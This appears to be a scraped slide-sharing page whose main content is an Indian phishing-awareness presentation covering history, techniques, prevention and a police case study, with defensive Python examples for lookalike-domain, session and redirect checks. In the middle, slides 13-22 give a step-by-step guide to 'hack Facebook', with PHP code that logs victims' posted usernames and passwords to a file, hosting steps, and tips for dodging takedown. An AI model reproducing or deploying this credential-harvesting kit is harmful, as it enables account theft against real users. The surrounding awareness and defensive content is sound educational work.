In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. Phishing is a fraudulent e-mail that attempts to get you to divulge personal data that can then be used for illegitimate purposes.
From this ppt you can learn the basics of phishing, along with some cases tracked by the Indian police; there are also some sections related to phishing.
I think this will be a good ppt for you. Suggestions are invited at "singh7737777476@gmail.com". Thanks for downloading this, and feel free to share your ideas.
Phishing basics: include its history
Introduction: phishing in detail
Techniques: Techniques used like link manipulation,web forgery
New phish: spear phishing
reason behind phishing
latest case study
survey: on top hosting and victim countries
Examples: popular website and email examples
Phishing--The Entire Story of a Dark World (Avishek Datta)
Phishing is a common problem in today's world. I have summarized some of the essential points needed for anyone to safeguard against all known Phishing attacks.
Phishing is one of the oldest tricks in the book of hackers. But as old as it might be, phishing still remains the most lucrative tool for cybercriminals. In this presentation, we will help you understand about phishing and tell you how you can avoid phishing attacks.
This is a presentation I have delivered to many organisations over the past 12 months on the subject of Spear Phishing. It shows how easily companies can fall victim to Spear Phishing attacks and the methods that criminals use to increase their chances of success.
2017 Phishing Trends & Intelligence Report: Hacking the Human (PhishLabs)
PhishLabs' Phishing Trends and Intelligence annual report provides insight on significant trends, tools, and techniques used by threat actors to carry out phishing attacks. It provides context and perspective into HOW and WHY these trends are occurring.
By understanding the threat, we can better defend against it. The report data is sourced from more than one million confirmed phishing sites residing across more than 170,000 unique domains. We investigated more than 7,800 phishing attacks every month, identifying the underlying infrastructure used in the attacks and shutting them down. The report uses this data to illuminate significant trends, tools, and techniques being used by the threat actors.
To download the on-demand full webinar, click here: https://info.phishlabs.com/phishing-trends-and-intelligence-pti-report-webinar
To download the PTI Report, click here: https://info.phishlabs.com/2017-phishing-trends-and-intelligence-report-pti
Phishing attack, with SSL Encryption and HTTPS Working (Sachin Saini)
This presentation contains an introduction to phishing attacks, their types and various techniques, and their impact with a real live example, followed by avoidance, prevention and solutions. It also contains a brief introduction to SSL and HTTPS and how they work.
Info Session on Cybersecurity & Cybersecurity Study Jams (GDSCCVR)
In an era where digital threats are ever-evolving, understanding the fundamentals of cybersecurity is crucial.
Highlights of the Event:
💡 Google Cybersecurity Certification Scholarship.
🎭 Cloning and Phishing Demystified
🚨 Unravelling the Depths of Database Breaches
🛡️ Digital safety 101
🧼 Self-Check for Cyber Hygiene
⏺️ Event Details:
Date: 18th December 2023
Time: 6:00 PM to 7:00 PM
Venue: Online
It contains knowledge about phishing and how it happens. It also contains knowledge about how we can prevent it. So this slide contains all the basic knowledge about phishing and anti-phishing.
CyberSecurity - Computers In Libraries 2024 (Brian Pichman)
Protecting privacy and security while leveraging technology to accomplish positive change is becoming a serious challenge for individuals, communities, and businesses. This workshop, led by expert leaders and practitioners, covers personal and organizational privacy as well as top security issues for libraries and their communities, especially the implications of AI. If you don’t have a security plan in place, are unsure of where to even start to make sure your library is secure, or have an existing plan in place but want to cross your T’s and dot your I’s, come to this interactive workshop.
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing... (WhoisXML API)
Your domain name represents your online identity. Its misuse and abuse can be likened to destroying your brand’s reputation. Identify some wide-spread threats that domains face, along with, a practical solution to help you keep your brand safe online.
Cybersecurity - Defense Against The Dark Arts Harry Potter Style (Brian Pichman)
Step right into a realm where cyber security meets the enchanting world of Harry Potter! Join Brian Pichman, our fearless Defense Against the Dark Arts wizard, as he unveils the secrets to safeguarding our digital realms. Prepare to be captivated as Brian illuminates the spellbinding techniques of encryption, firewalls, and intrusion detection, equipping us to fortify our cherished data against the sinister forces of the digital realm.
But beware! Just like in the magical world, treacherous adversaries prowl the shadows. Brian will expose the dark arts of phishing, ransomware, and social engineering, empowering us to defend our digital castles. Engrossed in tales of peril and armed with ancient cyber security spells, this captivating presentation promises to leave you spellbound and ready to protect yourself in this ever-evolving landscape. So grab your wands and brace yourselves as Brian Pichman conjures a shield of protection, ensuring the safety of our digital realms against the forces of darkness. Together, we shall prevail in this journey of cyber security and magic.
Protecting Your Business from Cybercrime - Cybersecurity 101 (David J Rosenthal)
Cybercrime impacts a lot of users every year.
Indirectly (compromised merchant – credit card)
Directly (compromised login credentials)
Cybercrime’s impact can be financial and reputational for your company
Impacts 1 in 5 small businesses every year
Cybercrime is a global business
The Internet allows attackers to be anywhere in the world and attacking victims anywhere in the world
Today more organized and motivated than any time in history
Based on the below and using the 12 categories of threats identify 3 .pdf (arri2009av)
Based on the below and using the 12 categories of threats identify 3 examples you can find
online, in the media for each of the threats listed on the right column. You can use news articles
to justify the threats. Use the most current news article you can find. Add the reference link for
each article and place in APA format. Prepare a memo to your CEO with your finding. On the
same memo research current vendors that provide phishing email tools to train your employees
and provide a recommendation to the CEO about which to buy. Compare at least 2 vendors and
identify the following. Features Cost Add the Phishing Quiz Exercise discussed in class to the
bottom of your memo pages. Take the quiz and answer the below Identify which questions you
got wrong from the quiz Provide a brief explanation on why you got it wrong. What did you
learn about phishing emails and what would you recommend in order to avoid falling for a
phishing email?
Solution
1) Threat to intellectual property: Hacking. After conducting a forensic review of the drives,
Bailey (CEO of an IT company) learned that intruders had been lurking on two of his company’s
servers for almost a year. These hackers, who were traced to a university in Beijing, had entered
the company’s extranet through an unpatched vulnerability in the Solaris operating system. As
far as Bailey could tell, they hadn’t accessed any classified information. But they were able to
view mountains of intellectual property, including design information and product specifications
related to transportation and communications systems, along with information belonging to the
company’s customers and partners.
Activist hackers, or hacktivists, can also be a danger to companies. For example, early last year
members of Anonymous, the hacker collective, copied and publicly released sensitive files of
H.B. Gary Federal, a security company.
Copyright deviation or piracy:
Intellectual property theft involves robbing people or companies of their ideas, inventions, and
creative expressions—known as “intellectual property”—which can include everything from
trade secrets and proprietary products and parts to movies, music, and software.
It is a growing threat—especially with the rise of digital technologies and Internet file sharing
networks. And much of the theft takes place overseas, where laws are often lax and enforcement
is more difficult. All told, intellectual property theft costs U.S. businesses billions of dollars a
year and robs the nation of jobs and tax revenues.
Preventing intellectual property theft is a priority of the FBI’s criminal investigative program. It
specifically focuses on the theft of trade secrets and infringements on products that can impact
consumers’ health and safety, such as counterfeit aircraft, car, and electronic parts. Key to the
program’s success is linking the considerable resources and efforts of the private sector with law
enforcement partners on local, state, federal, and international levels.
IRJET-Content based approach for Detection of Phishing Sites (IRJET Journal)
Anjali Gupta, Juili Joshi, Khyati Thakker, Chitra Bhole, "Content based approach for Detection of Phishing Sites", International Research Journal of Engineering and Technology (IRJET), Volume 2, Issue 01, April 2015. e-ISSN: 2395-0056, p-ISSN: 2395-0072. www.irjet.net
Abstract
Phishing is a significant problem involving fraudulent email and web sites that trick unsuspecting users into revealing private information. In this paper, we present the design, implementation, and evaluation of a content-based approach to detecting phishing web sites. We also discuss the design and evaluation of several heuristics we developed to reduce false positives. Our experiments show that CANTINA is good at detecting phishing sites, correctly labeling approximately 95% of phishing sites. We are going to implement Revelation of Masquerade Attacks: A Content-Based Approach to Detecting Phishing Web Sites using PHP & MySQL. Our system will crawl the original site of the bank and retrieve all URLs, the location of the bank's server and whois information. If a user gets an email with a phishing attack link, our system will take that URL as input, crawl the link, retrieve all URLs and compare them with the original bank's URL database to find whether the URLs are similar or not. The system will then find the location of the phishing link URL and compare it with the original bank's location. After that the system will find the whois information of the URL. The system will analyze the information and show the results to the user.
2. Agenda
1:- INTRODUCTION,DEFINITION AND DESCRIPTION OF
PHISHING
2:- HISTORY AND CURRENT STATUS OF PHISHING
3:- PHISHING TECHNIQUES
4:- HACKING FACEBOOK ACCOUNTS BY PHISHING – STEP
BY STEP!
5:- DAMAGE CAUSED BY PHISHING AND ANTIPHISHING
6:-How To Combat Phishing
What to do ? And What not to do?
7:- RECENT PHISHING ATTEMPTS,LEGAL RESPONSE AND
CASE STUDY
3. DEFINITION AND DESCRIPTION
• Phishing is an attempt to illegally acquire information such as
usernames, passwords and credit card details of a person
or organization through an electronic communication.
• Phishing is committed so that the phisher may obtain sensitive
and valuable information about a consumer, usually with the
goal of fraud to obtain the customer's bank and other financial
information.
• Phishing is typically carried out by e-mail spoofing or instant
messaging.
4.
5. • In phishing the criminals create a fake website whose look
and feel are identical to the legitimate one, in which the
victims are told to enter their confidential details like
username, password or account details.
• The phishing technique was described in detail in the year 1987
and this technique was first used in the year 1995.
• Phishing is mainly committed so that the criminal may obtain
sensitive & valuable information about the customer.
• Phishing makes high profit with little or small technological
investment.
6. History
Phreaking + Fishing = Phishing
- Phreaking = making phone calls for free back in the 70’s
- Fishing = Use bait to lure the target
Phishing in 1995
Target: AOL users
Purpose: getting account passwords for free time
Threat level: low
Techniques: Similar names ( www.ao1.com for www.aol.com ), social
engineering
Phishing in 2001
Target: Ebayers and major banks
Purpose: getting credit card numbers, accounts
Threat level: medium
Techniques: Same as in 1995, keylogger
Phishing in 2007
Target: Paypal, banks, ebay
Purpose: bank accounts
Threat level: high
Techniques: browser vulnerabilities, link obfuscation
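The similar-name trick listed for 1995 (www.ao1.com for www.aol.com) and the later link obfuscation can be checked for mechanically on the receiving side. The following is an added example, not part of the original slides; the protected-domain list (apart from aol.com), the confusable table and the two-label domain rule are assumptions made for illustration.

```python
"""Flag hostnames that imitate a protected domain (added illustration)."""
from urllib.parse import urlsplit

# Assumption: sample list of domains to protect; aol.com is the slide's own example.
PROTECTED = ["aol.com", "paypal.com", "ebay.com"]

# Assumption: a small table of character swaps that read alike on screen.
# Multi-character pairs come first so "rn" is folded before single letters.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("i", "l"), ("5", "s")]


def skeleton(name):
    """Fold visually confusable characters so look-alikes compare equal."""
    for fake, real in CONFUSABLES:
        name = name.replace(fake, real)
    return name


def edit_distance(a, b):
    """Plain Levenshtein distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(link):
    """Return (verdict, imitated_domain) for a hostname or URL."""
    parts = urlsplit(link if "://" in link else "//" + link)
    host = (parts.hostname or "").lower().rstrip(".")
    if parts.username is not None:
        # In http://www.aol.com@other.example/ the text before "@" is only
        # userinfo; the browser connects to the host after it.
        return ("userinfo-obfuscation", None)
    labels = host.split(".")
    # Simplification: treat the last two labels as the registered domain.
    domain = ".".join(labels[-2:])
    if domain in PROTECTED:
        return ("legitimate", domain)
    for brand in PROTECTED:
        if skeleton(domain) == skeleton(brand):
            return ("homoglyph", brand)
    for brand in PROTECTED:
        # Distance 1 yields candidates for review, not proof of abuse.
        if edit_distance(domain, brand) == 1:
            return ("typo", brand)
    for brand in PROTECTED:
        name = skeleton(brand.split(".")[0])
        if any(skeleton(label) == name for label in labels[:-2]):
            return ("brand-in-subdomain", brand)
    return ("no-match", None)


# Constructed sample links, not taken from real traffic.
SAMPLES = [
    "www.aol.com",
    "www.ao1.com",
    "paypall.com",
    "aol.com.secure-login.example.net",
    "http://www.aol.com@example.net/login",
    "example.org",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, classify(sample))
```
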
7. Current status of Phishing
• The APWG received 26,150 unique phishing reports.
• This total represents the second highest number of phishing
reports that the APWG has received in a single month.
• The APWG detected 10,091 unique phishing websites
worldwide.
• 148 separate corporate brands were “hijacked” (misused) in
phishing schemes (compared to 84 in August 2005).
• The financial sector was the most heavily targeted for
phishing schemes, constituting 92.6 percent of all phishing
attacks.
8. • The APWG found 2,303 unique websites that hosted
“keylogging” programs.
• The United States was the country hosting the largest
percentage of phishing websites (27.7 percent, compared to
27.9 percent in August 2005), while Canada ranked ninth
among countries hosting such websites (2.2 percent,
compared to 2.21 percent in August 2005). China remains the
second most frequent host of phishing websites (14 percent,
compared to 12.15 percent in August 2005), and South Korea
the third most frequent host of such sites (9.59 percent,
compared to 9.6 percent in August 2005).
9. • A very recent and popular case of phishing is that Chinese
phishers are targeting the Gmail accounts of high-ranking officials of
the United States and South Korean governments, military
information & Chinese political activities.
10. Phishing Technique
Deceptive - Sending a deceptive email, in bulk, with
a “call to action” that demands the recipient click on
a link.
Malware-Based - Running malicious software on the user’s
machine. Various forms of malware-based phishing are:
Key Loggers & Screen Loggers
Session Hijackers
Web Trojans
Data Theft
DNS-Based - Phishing that interferes with the integrity of the
lookup process for a domain name. Forms of DNS-based phishing
are:
Hosts file poisoning
Polluting user’s DNS cache
Proxy server compromise
11. Content-Injection – Inserting malicious content into legitimate
site.
Three primary types of content-injection phishing:
Hackers can compromise a server through a security
vulnerability and replace or augment the legitimate
content with malicious content.
Malicious content can be inserted into a site through a
cross-site scripting vulnerability.
Malicious actions can be performed on a site through a
SQL injection vulnerability.
12. • Man-in-the-Middle Phishing - Phisher positions
himself between the user and the legitimate site.
• Search Engine Phishing - Create web pages for fake
products, get the pages indexed by search engines,
and wait for users to enter their confidential
information as part of an order, sign-up, or balance
transfer.
13. Step To Hack Facebook
• Step 1: Go to http://www.facebook.com and right-click on the
home page and select view page source.
14. • Step 2: Find for something which looks like this :
15. Step 3: Then change the action URL to login.php, now it will
look similar to this.
Save it as index.html.
16. • Step 4: Open a notepad and paste the following code inside it and
save as login.php.
<?php
header (‘Location: http://www.facebook.com’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Here, the victim will be redirected to http://www.facebook.com. You
can change it to your desired location by editing the arguments of
header function in the above PHP code.
17. • Step 5: Create another blank text file for storing the hacked
usernames and passwords and name it as passwords.txt.
Now you are done with the setup of phishing page, all you
need to do is host it somewhere on internet so that it
becomes available to your victim.
• Step 6: Go to some free hosting site
like http://www.000webhost.com and sign up for free. You will
be provided with 1.5GB free space to host your web pages and
free domain. You will have to complete email confirmation
step to get your web page running.
18. • Step 7: Once you get your account activated, sign in and
click Go to CPanel as shown below.
20. • Step 9: Now you will see a folder public html in the web
based ftp client page, click on the folder and open it.
21. • Step 10: Click on Upload and select all the 3 files and finally
click on the green tick to upload them as shown in the image
below.
• Once you get your files uploaded you can check your page at
your registered domain.
22. • The victim’s password will be automatically written
into passwords.txt file, just open the file to see the username
and password!
• Congratulations you are done creating your phishing page! If
you have understood everything perfectly then you can use
this technique to create phishing pages for other sites also.
• Note: Phishing pages at free hosting services will be
immediately deleted, if once detected. So my advice is to use
a paid hosting service or else host it on your system.
23. DAMAGE CAUSED BY PHISHING
• The impacts of phishing are both domestic and international,
and concern the commercial and financial sectors.
• Direct Financial Loss. Phishing is mainly done to
cause financial loss to a person or an organization. In this,
consumers and businesses may lose from a few hundred
dollars to millions of dollars.
• Erosion of Public Trust in the Internet. Phishing also
decreases the public’s trust in the Internet.
24.
25. • A survey found that 9 out of 10 American adult Internet users
have made changes to their Internet habits because of the
threat of identity theft.
• 30 percent say that they reduced their overall usage.
• 25 percent say they have stopped shopping online, while
29 percent of those that still shop online say they have
decreased the frequency of their purchases.
26. Anti-Phishing
Anti-Phishing Working Group (APWG)
The APWG has 2300+ members from over
1500 companies & agencies worldwide. Member
companies include leading security companies such
as Symantec, McAfee and VeriSign. Financial
industry members include the ING Group, VISA,
Mastercard and the American Bankers Association.
27. Educate application users
Think before you open
Never click on the links in an email, message boards or mailing
lists
Never submit credentials on forms embedded in emails
Inspect the address bar and SSL certificate
Never open suspicious emails
Ensure that the web browser has the latest security patch applied
Install latest anti-virus packages
Destroy any hard copy of sensitive information
Verify the accounts and transactions regularly
Report the scam via phone or email.
28. Formulate and enforce Best practices
Authorization controls and access privileges for systems,
databases and applications.
Access to any information should be based on the
need-to-know principle
Segregation of duties.
Media should be disposed only after erasing sensitive
information.
Reinforce application development / maintenance processes:
1. Web page personalization
Using two pages to authenticate the users.
Using Client-side persistent cookies.
2. Content Validation
Never inherently trust the submitted data
Never present the submitted data back to an application user
without sanitizing it
Always sanitize data before processing or storing
Check the HTTP Referer header
29. 3. Session Handling
Make session identifiers long, complicated and difficult to
guess.
Set expiry time limits for SessionIDs and check them on
every client request.
The application should be capable of revoking active SessionIDs
and should not recycle the same SessionID.
Any attempt to use an invalid SessionID should be redirected to the
login page.
Never accept session information within a URL.
Protect the session via SSL.
Session data should be submitted as a POST.
After authenticating, a new SessionID should be used (HTTP &
HTTPS).
Never let the users choose the SessionID.
4. Image Regulation
Image Cycling
Session-bound images
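The session-handling rules above can be seen working together in a small server-side store. This is an added example, not part of the original slides; the class name, the cookie name "SessionID", the 15-minute limit and the in-memory dictionary are assumptions made for illustration.

```python
import secrets
import time

SESSION_TTL_SECONDS = 900  # assumed expiry limit for this example


class SessionStore:
    """In-memory store (assumption); production code would use a shared backend."""

    def __init__(self, ttl=SESSION_TTL_SECONDS, clock=time.monotonic):
        self._ttl = ttl
        self._clock = clock
        self._sessions = {}  # SessionID -> {"user": ..., "expires": ...}

    def create(self, user=None):
        # 32 bytes from the OS CSPRNG: long, hard to guess, chosen by the server.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "expires": self._clock() + self._ttl}
        return sid

    def validate(self, sid):
        """Run on every request. None means: redirect to the login page."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None  # unknown, revoked or client-invented SessionID
        if self._clock() >= entry["expires"]:
            self.revoke(sid)  # expired ids are dropped, never revived
            return None
        return entry

    def revoke(self, sid):
        self._sessions.pop(sid, None)

    def login(self, old_sid, user):
        """Issue a new SessionID at authentication; the pre-login id dies."""
        self.revoke(old_sid)
        return self.create(user)


def resolve_session(store, cookies, query_params):
    # Only the cookie is consulted. A SessionID carried in the URL
    # (query_params) is deliberately ignored, so a crafted link cannot
    # plant or reuse a session.
    sid = cookies.get("SessionID")
    return store.validate(sid) if sid else None
```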
30. 5. URL Qualification
Do not reference the redirection URL in the browser’s URL
Always maintain a valid approved list of redirection URLs
Never allow customers to supply their own URLs
Never allow IP addresses to be used in URL information
6. Authentication Process
Ensure that a 2-phase login process is in place
Personalize the content
Design a strong token-based authentication
7. Transaction non-repudiation
To ensure authenticity and integrity of the transaction
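The URL Qualification rules above translate into two checks: redirects are selected by an opaque key from an approved list, and any URL the application handles is rejected if its host is an IP address in any form. This is an added example, not part of the original slides; the approved list, its keys and the function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed approved list for this example.
APPROVED_REDIRECTS = {
    "home": "https://www.example.com/",
    "statements": "https://www.example.com/statements",
}
DEFAULT_KEY = "home"


def redirect_target(key):
    """The client sends a key, never a URL; unknown keys fall back to home."""
    return APPROVED_REDIRECTS.get(key, APPROVED_REDIRECTS[DEFAULT_KEY])


def uses_ip_host(url):
    """True if the URL's host is an IP address rather than a DNS name."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return True  # unparsable host: treat as rejected
    if not host:
        return False
    host = host.rstrip(".")
    try:
        ipaddress.ip_address(host)  # dotted IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    # Browsers also accept legacy numeric hosts (single decimal integer,
    # hex or octal parts). A real DNS name never ends in a numeric label,
    # so a numeric last label marks the host as an IP form.
    last_label = host.rsplit(".", 1)[-1]
    return re.fullmatch(r"0x[0-9a-f]*|[0-9]+", last_label) is not None
```

Because `urlsplit` separates the userinfo part from the host, a URL such as `https://www.example.com@203.0.113.5/` is judged on its real host, the IP address.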
31. PREVENTION TO BE TAKEN
TO AVOID PHISHING
• 1. Prevention: What to Do
• Protect your computer with anti-virus software, spyware
filters, e-mail filters, and firewall programs, and make sure
that they are regularly updated.
• Ensure that your Internet browser is up to date and security
patches applied.
• Avoid responding to e-mail from unknown senders or giving your
financial information in reply to such mail.
32. • Unless the e-mail is digitally signed, it should also be considered fake.
• Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
• Phisher e-mails are typically not personalized, while valid
messages from your bank or e-commerce company are
generally personalized.
• Always ensure that you're using a secure website when
submitting credit card or other sensitive information via your
Web browser.
33. • To make sure you're on a secure Web server, check the
beginning of the Web address in your browser's address bar - it
should be "https://" rather than just "http://".
• Regularly log into your online accounts. Don't leave them for
a long period of time.
• Regularly check your bank, credit and debit card statements
to ensure that all transactions are legitimate.
• If anything is suspicious, contact your bank and all card
issuers.
35. 2. Prevention: What Not to Do
• Don't assume that you can correctly identify a website
as legitimate by just looking at it.
• Don’t use the links in an e-mail to get to any web page if
you think that the message might not be authentic.
Instead, log on to the website directly by typing the Web address
into your browser.
• Avoid filling out forms in e-mail messages that ask for
personal financial information.
36. • You should only communicate information such as credit card
numbers or account information via a secure website or the
telephone.
37. What does all the above imply?
It is better to be safer now than feel sorry later.
38. Case study
Case - fraud done by Mumbai mafia in IT city
City - Bangalore
State - Karnataka
Background
• The cyber crime police of Bangalore, after a two-year
investigation, have proved that the Mumbai mafia is phishing
the IT city.
• They have arrested three persons in connection with
3 different incidents.
• A CID official of SP’s rank said that this is a dangerous trend.
39. The cyber crime police station (CCPS) registered around
100 such phishing cases in 2009, but it is difficult for
them to trace every case, as the offenders use benami bank
accounts to do all this.
The cyber crime police had arrested 3 persons, all
from Mumbai, who are connected with this case.
• The police said that all the arrested persons are graduates
and have a good knowledge of computers.
40. Investigation
• The cyber crime police had arrested one Abdul Khan from
Mumbai.
• The arrested person had transferred Rs 1 lakh (Rs 50,000
twice) from the ICICI account of one IT professional, Abhishek
Malvia, a native of Itarsi, Madhya Pradesh.
41. Conclusion
• Phishing is a form of criminal conduct that poses increasing
threats to consumers, financial institutions, and commercial
enterprises in Canada, the United States, and other countries.
Because phishing shows no sign of abating, and indeed is likely
to continue in newer and more sophisticated forms, law
enforcement, other government agencies, and the private
sector in both countries will need to cooperate more closely
than ever in their efforts to combat phishing, through
improved public education, prevention, authentication, and
binational and national enforcement efforts.